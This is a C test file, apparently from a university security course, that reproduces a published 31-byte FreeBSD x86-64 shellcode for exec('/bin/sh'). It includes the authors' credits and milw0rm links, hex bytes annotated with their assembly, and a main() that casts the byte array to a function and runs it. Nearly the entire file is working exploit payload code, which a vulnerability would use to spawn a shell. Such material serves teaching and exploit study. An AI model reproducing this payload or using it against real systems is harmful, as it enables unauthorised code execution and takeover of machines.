csci5271/bcvi/test.c

/**
 *
 *   _   _            _            ____       _ _
 *  | | | | __ _  ___| | ___ __   |  _ \ ___ | | |
 *  | |_| |/ _` |/ __| |/ / '_ \  | |_) / _ \| | |
 *  |  _  | (_| | (__|   <| | | | |  _ < (_) | | |
 *  |_| |_|\__,_|\___|_|\_\_| |_| |_| \_\___/|_|_|
 *           [ http://www.hacknroll.com ]
 *
 * Description:
 *    FreeBSD x86-64 exec("/bin/sh") Shellcode - 31 bytes
 *
 *
 *
 * Authors:
 *    Maycon M. Vitali ( 0ut0fBound )
 *        Milw0rm .: http://www.milw0rm.com/author/869
 *        Page ....: http://maycon.hacknroll.com
 *        Email ...: maycon@hacknroll.com
 *
 *    Anderson Eduardo ( c0d3_z3r0 )
 *        Milw0rm .: http://www.milw0rm.com/author/1570
 *        Page ....: http://anderson.hacknroll.com
 *        Email ...: anderson@hacknroll.com
 *
 * -------------------------------------------------------
 *
 * amd64# gcc hacknroll.c -o hacknroll
 * amd64# ./hacknroll
 * # exit
 * amd64#
 *
 * -------------------------------------------------------
 */

const char shellcode[] =
    "\x48\x31\xc0"                             // xor    %rax,%rax
    "\x99"                                     // cltd
    "\xb0\x3b"                                 // mov    $0x3b,%al
    "\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x73\x68" // mov $0x68732f6e69622fff,%rdi
    "\x48\xc1\xef\x08"                         // shr    $0x8,%rdi
    "\x57"                                     // push   %rdi
    "\x48\x89\xe7"                             // mov    %rsp,%rdi
    "\x57"                                     // push   %rdi
    "\x52"                                     // push   %rdx
    "\x48\x89\xe6"                             // mov    %rsp,%rsi
    "\x0f\x05";                                // syscall

int main(void) {
  (*(void (*)())shellcode)();
  return 0;
}